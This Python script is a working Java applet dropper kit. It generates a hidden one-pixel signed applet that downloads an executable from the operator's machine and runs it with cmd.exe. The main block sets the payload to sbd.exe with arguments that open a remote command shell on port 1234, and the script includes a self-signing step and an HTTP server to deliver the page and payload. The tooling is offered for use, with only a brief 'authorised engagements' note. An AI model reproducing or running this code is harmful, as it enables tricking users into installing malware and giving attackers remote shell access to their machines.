
#!/usr/bin/python

"""
This is based on Val Smith's pre-Metaphish work, and the Python roughly corresponds to the Aitel book of style.
"""

import os
import re
import socket
import subprocess

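class jvd(object):
    r"""Java applet dropper kit.

    Builds a one-pixel, self-signed Java applet that, once a browser loads
    the generated HTML page and the user accepts the certificate prompt
    (a signed applet leaves the sandbox only after that acceptance),
    downloads ``localurl`` to ``command`` -- or to the LOCALFILE applet
    parameter when one is given -- and runs it via ``cmd.exe /c`` with
    ``command_args``. The generated applet therefore only targets Windows.

    Pipeline (see run()): icode -> jcode -> javac -> jarit -> sign -> servit.
    The JDK tools javac, jar, keytool and jarsigner must be on PATH; they
    are executed without a shell, so argument values are passed literally.

    Attributes the caller sets before run():
      localurl     -- URL of the payload the applet downloads.
      iName        -- path of the HTML page to write.
      certName     -- CN placed in the throwaway signing certificate.
      command      -- local path the payload is saved to and executed from.
                      It is spliced verbatim into a Java string literal, so
                      backslashes must already be doubled, e.g. ``c:\\d.exe``
                      (the applet then sees ``c:\d.exe``).
      command_args -- text appended after command in the exec call, verbatim.
      base_name    -- Java class name; java_name, class_name,
                      unsigned_jarname and signed_jarname are derived from it
                      and kept in sync when it is reassigned.

    NOTE(review): for authorised engagements only. The keystore credentials
    below are fixed, throwaway values; never point this tool at a real
    code-signing key, and run it from a scratch directory (see servit()).
    """

    # Throwaway signing material. keytool writes KEYSTORE into the current
    # directory, which servit() later exposes over HTTP.
    KEYSTORE = "tkeystore"
    STORE_PASS = "tstorepass"
    KEY_PASS = "tkeypass"
    KEY_ALIAS = "signFiles"

    # javac requires the public class name to be an identifier and to match
    # the .java file name; restrict base_name to the ASCII identifier subset.
    _JAVA_IDENT = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")

    # Applet source. Substituted: cls (Java class name), command, args.
    # command and args land inside Java string literals with no escaping.
    JAVA_TEMPLATE = """\
import java.applet.Applet;
import java.io.*;
import java.net.*;
import java.io.IOException;

public class %(cls)s extends Applet {
    public %(cls)s() { }

    public void init() {
        downloadURL();
        cmd();
    }

    /* Fetch the URI applet parameter into LOCALFILE (default: the command path). */
    public void downloadURL() {
        OutputStream out = null;
        InputStream in = null;
        try {
            URL url = new URL(getParameter("URI"));
            String localfile = getParameter("LOCALFILE");
            if (localfile == null) { localfile = "%(command)s"; }
            out = new BufferedOutputStream(new FileOutputStream(localfile));
            in = url.openConnection().getInputStream();
            byte[] buffer = new byte[1024];
            int numRead;
            while ((numRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, numRead);
            }
        } catch (Exception exception) {
            exception.printStackTrace();
        } finally {
            try {
                if (in != null) { in.close(); }
                if (out != null) { out.close(); }
            } catch (IOException ioe) { }
        }
    }

    /* Run the dropped file. A single-string exec is split on whitespace,
       so command must not contain spaces. */
    public void cmd() {
        try {
            Runtime.getRuntime().exec("cmd.exe /c %(command)s %(args)s");
        } catch (IOException ioexception) { }
    }
}
"""

    def __init__(self):
        """Set placeholder config; the caller fills the attributes in."""
        self.localurl = " "
        self.iName = " "
        self.certName = " "
        self.command = " "
        self.command_args = " "
        self.base_name = "update"  # also sets the derived file names

    @property
    def base_name(self):
        """Java class name; the build artefacts are named after it."""
        return self._base_name

    @base_name.setter
    def base_name(self, value):
        # Keep the derived names in step so a caller that reassigns
        # base_name after construction does not get a stale java/jar name.
        if not self._JAVA_IDENT.match(value):
            raise ValueError("base_name must be a Java identifier: %r" % (value,))
        self._base_name = value
        self.java_name = value + ".java"
        self.class_name = value + ".class"
        self.unsigned_jarname = value + "_unsigned_.jar"
        self.signed_jarname = value + ".jar"

    def _run(self, argv, check=True):
        """Run argv (a list, no shell) after echoing it; return the exit status.

        With check=True a non-zero status raises subprocess.CalledProcessError
        so a failed build step stops the pipeline instead of silently handing
        a missing artefact to the next one. Raises OSError if the tool is
        not on PATH.
        """
        print("[*] executing " + " ".join(argv))
        status = subprocess.call(argv)
        if check and status != 0:
            raise subprocess.CalledProcessError(status, argv[0])
        return status

    @staticmethod
    def _attr_escape(value):
        """Escape value for use inside a double-quoted HTML attribute."""
        return value.replace("&", "&amp;").replace('"', "&quot;")

    def write_file(self, name, data):
        """Write data to name in text mode, truncating, and report it."""
        with open(name, 'w') as fh:
            fh.write(data)
        print("[*] wrote to " + name)

    def jcode(self, command, command_args, filename):
        """Write the applet source to filename.

        The Java class is named self.base_name, so filename should be
        self.java_name (javac requires the two to agree). command and
        command_args are substituted verbatim with no Java escaping; see the
        class docstring for the backslash convention.
        """
        source = self.JAVA_TEMPLATE % {"cls": self.base_name,
                                       "command": command,
                                       "args": command_args}
        self.write_file(filename, source)

    def sign(self, signed_jar, unsigned_jar, cert):
        """Sign unsigned_jar into signed_jar with a self-signed key.

        cert becomes the certificate's CN. No shell is involved, so it is
        passed literally -- do not add shell quoting around it.
        """
        genkey = ["keytool", "-genkey", "-alias", self.KEY_ALIAS,
                  "-keystore", self.KEYSTORE,
                  "-storepass", self.STORE_PASS,
                  "-dname", "cn=" + cert,
                  "-keypass", self.KEY_PASS]
        # keytool refuses to overwrite an existing alias, so on a re-run this
        # step fails and the key created last time is reused; that is fine.
        if self._run(genkey, check=False) != 0:
            print("[!] keytool returned non-zero (alias already in "
                  + self.KEYSTORE + "?), reusing the existing key")
        signjar = ["jarsigner", "-keystore", self.KEYSTORE,
                   "-storepass", self.STORE_PASS,
                   "-keypass", self.KEY_PASS,
                   "-signedjar", signed_jar, unsigned_jar, self.KEY_ALIAS]
        self._run(signjar)

    def servit(self, port=8000):
        """Serve the current directory over HTTP on all interfaces until Ctrl-C.

        port must match the one embedded in localurl. Everything in the
        directory is exposed -- including the keystore with the fixed
        password above and the generated .java source -- so run the kit
        from a scratch directory holding only the page, the signed jar and
        the payload.
        """
        try:
            from http.server import HTTPServer, SimpleHTTPRequestHandler
        except ImportError:  # Python 2
            from BaseHTTPServer import HTTPServer
            from SimpleHTTPServer import SimpleHTTPRequestHandler
        httpd = HTTPServer(("", port), SimpleHTTPRequestHandler)
        print("[*] serving %s on port %d" % (os.getcwd(), port))
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            pass
        finally:
            httpd.server_close()

    def javac(self, java_name, class_name):
        """Compile java_name; class_name is only used for the status line.

        Raises subprocess.CalledProcessError when javac fails.
        """
        self._run(["javac", java_name])
        print("[*] compiled " + java_name + " to classfile " + class_name)

    def jarit(self, jarfile, classfile):
        """Pack classfile into jarfile (unsigned)."""
        print("[*] compressing " + jarfile)
        self._run(["jar", "-cvf", jarfile, classfile])

    def icode(self, filename, localurl):
        """Write a page embedding the signed applet with localurl as its URI.

        The applet tag references self.class_name and self.signed_jarname;
        localurl is attribute-escaped so '&' or '"' cannot break the tag.
        """
        page = ('<html><body>'
                '<APPLET code="%s" archive="%s" width="1" height="1">'
                '<PARAM NAME="URI" VALUE="%s">'
                '</APPLET></body></html>'
                % (self.class_name, self.signed_jarname,
                   self._attr_escape(localurl)))
        self.write_file(filename, page)

    def run(self):
        """Generate, build, sign and then serve the applet (blocks)."""
        self.icode(self.iName, self.localurl)
        self.jcode(self.command, self.command_args, self.java_name)
        self.javac(self.java_name, self.class_name)
        self.jarit(self.unsigned_jarname, self.class_name)
        self.sign(self.signed_jarname, self.unsigned_jarname, self.certName)
        self.servit()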




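if __name__ == '__main__':
    print("[*] initiating java dropper kit")
    # NOTE(review): gethostbyname(gethostname()) often resolves to a loopback
    # address (127.0.0.1, or 127.0.1.1 via /etc/hosts), which the target can
    # never reach; the URL is printed below so the operator can check it.
    local_ip_address = socket.gethostbyname(socket.gethostname())
    app = jvd()
    app.base_name = "update"
    # Port must match the one servit() listens on (8000) and sbd.exe must be
    # in the directory the script is run from.
    app.localurl = "http://" + local_ip_address + ":8000/sbd.exe"
    app.certName = "cert"
    # Spliced into a Java string literal, so the backslash is doubled here;
    # the applet sees c:\d.exe and both saves and runs the payload there.
    app.command = r"c:\\d.exe"
    app.command_args = "-lp 1234 -e cmd.exe"
    app.iName = "index.html"
    print("[*] payload URL: " + app.localurl)
    app.run()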
